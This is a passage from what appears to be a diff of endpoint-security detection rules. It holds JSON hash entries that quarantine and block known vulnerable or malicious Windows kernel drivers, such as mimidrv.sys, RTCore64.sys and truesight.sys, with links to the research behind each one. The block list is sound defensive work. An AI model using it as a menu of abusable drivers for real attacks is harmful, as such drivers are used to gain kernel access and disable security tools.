+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe9e30d7-42cd-5bf4-8533-ffc6aa44e019",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818595Z",
+ "creation_date": "2026-03-23T11:45:30.818597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c018eaa293c03febe2aef1e868fca782a06b49d7d2f9f388ae5fb57604c5250",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fea4556e-3811-5b05-8260-c70f7cc31eb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607935Z",
+ "creation_date": "2026-03-23T11:45:29.607937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607950Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9895458e73d4b0ef01eda347fb695bb00e6598d9f5e2506161b70ad96bb7298",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fea99ad8-0cd1-5ffa-a3bf-f3f17e104c60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156758Z",
+ "creation_date": "2026-03-23T11:45:31.156759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156765Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e5c7d0ca29d9f9420848aaa8d05ae59aa366a490c2b010e3e1becb3eb0ff3dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "feb1a439-8e4e-566c-a5ae-dac318aa0b1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140819Z",
+ "creation_date": "2026-03-23T11:45:31.140821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1bd9b485f6859a19552d9b01432be73b0bcde66aab8b9423c77d8817e930157",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "feb289df-0bb6-5b34-898a-cb71d54ab887",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822372Z",
+ "creation_date": "2026-03-23T11:45:30.822374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cc23f39380a590d822d9c064a064c274554d814b651ae4b2f0560d8b016f105",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "feb6edc4-0730-5325-919b-7be6539cc845",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612933Z",
+ "creation_date": "2026-03-23T11:45:29.612935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612940Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "615a7c647eba3f2dcea463d5705d5d59ca70b4250f895ad20ce6876076a8fa28",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "febb9889-8416-54ca-b5c9-9cc527864a05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145429Z",
+ "creation_date": "2026-03-23T11:45:32.145433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "206006a11f233b9ae876952308f6d60d7a75c80b4d530a3e6146a0b4d8cd3e4f",
+ "comment": "Malicious Kernel Driver (aka driver_206006a1.sys) [https://www.loldrivers.io/drivers/9e0a1bae-6509-41fd-a5bf-dfe6cf388682/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fec757b9-dee7-5ae6-9539-08938e7effc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152899Z",
+ "creation_date": "2026-03-23T11:45:31.152902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae896bb9bea5396d46552a7b6980110b24751522e55228728d3e15c9760ec610",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fed9d6d0-0c43-5c67-924b-025236b34707",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157493Z",
+ "creation_date": "2026-03-23T11:45:31.157495Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb31600da026a2b53fed032d906928e27ff317829e8ad77cd20aa838cac05f62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fedb3b3e-bbb1-5d14-8e94-dfffa6ade235",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477141Z",
+ "creation_date": "2026-03-23T11:45:30.477145Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477153Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "033c4634ab1a43bc3247384864f3380401d3b4006a383312193799dded0de4c7",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fee9d4e6-b1eb-5d40-ae28-11e89a55cd2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478162Z",
+ "creation_date": "2026-03-23T11:45:30.478166Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34d55c87feec5eeb4f826fc6301c22017cd3e83387529a06c5493c260597599b",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "feefadfe-5f06-51fb-9061-0e337cb84d75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473009Z",
+ "creation_date": "2026-03-23T11:45:30.473012Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "922d23999a59ce0d84b479170fd265650bc7fae9e7d41bf550d8597f472a3832",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fefdfffa-a9ca-59b6-bc7f-f9fa6b500ab6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819123Z",
+ "creation_date": "2026-03-23T11:45:30.819125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb11fe81a2d2ca868398055e9f8cc7349ff4ac6d0a4f1e85e7e5d04ed7357349",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff189a6d-8933-5d47-bacc-5aad0fc2ce04",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972319Z",
+ "creation_date": "2026-03-23T11:45:29.972321Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7fe1fa6d2e5502ff1882a345790d0aab3ad34fe269ab23e3115d2d93db3fe6b",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff1dba48-e4ae-5478-a65a-159da779a864",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479473Z",
+ "creation_date": "2026-03-23T11:45:31.479477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479487Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e960f161a76f0f805553471bc9d0eaa4b4dfa346ead37000892f2b7cc3e4872d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff20271a-86dd-5bd7-8423-8b1792d7b359",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984017Z",
+ "creation_date": "2026-03-23T11:45:29.984019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37e33b54de1bbe4cf86fa58aeec39084afb35e0cbe5f69c763ecaec1d352daa0",
+ "comment": "Vulnerable Kernel Driver (aka msrhook.sys) [https://www.loldrivers.io/drivers/1a1cf88a-96d0-46cd-a24d-1535e4a5f6e3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff21aca7-04e6-5115-b8d7-beed0a7c076d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499564Z",
+ "creation_date": "2026-03-23T11:45:31.499567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "829250e3c5cecd882f57e1e64593b7aa3ed89a9919ffa9b85183dac4f1f9b873",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff24216c-1e4e-5239-b499-1c245ee8d2f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816803Z",
+ "creation_date": "2026-03-23T11:45:30.816805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b4ea21da21a1167c00b903c05a4e3af6c514ea3dfe0b5f371f6a06305e1d27f",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff30d18a-4dc2-54c7-9466-0dfa2ff07e2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156310Z",
+ "creation_date": "2026-03-23T11:45:31.156311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9561b6d8c5328b01f05c7499624469085e1144f0d9f33568f3f1d438b70d06a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff33279e-1617-5fd8-8baf-d64a7c5f936e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141768Z",
+ "creation_date": "2026-03-23T11:45:31.141770Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d6101de6d747a4d88af30797fff089e04996019fa7c0d3c1895b1f92dbcac95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff3898a6-785a-59f8-8b8c-0f352b1297ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469303Z",
+ "creation_date": "2026-03-23T11:45:30.469307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6d56ffa4dcec362148ce6b3806773403cf7ca61f991e17f7286ee975a706f78",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff3adaaa-2d2c-5f46-924b-1a7f450d5a4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465681Z",
+ "creation_date": "2026-03-23T11:45:30.465684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82ac05fefaa8c7ee622d11d1a378f1d255b647ab2f3200fd323cc374818a83f2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff4b48ce-f581-5db8-8e6d-1ef95c245b8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
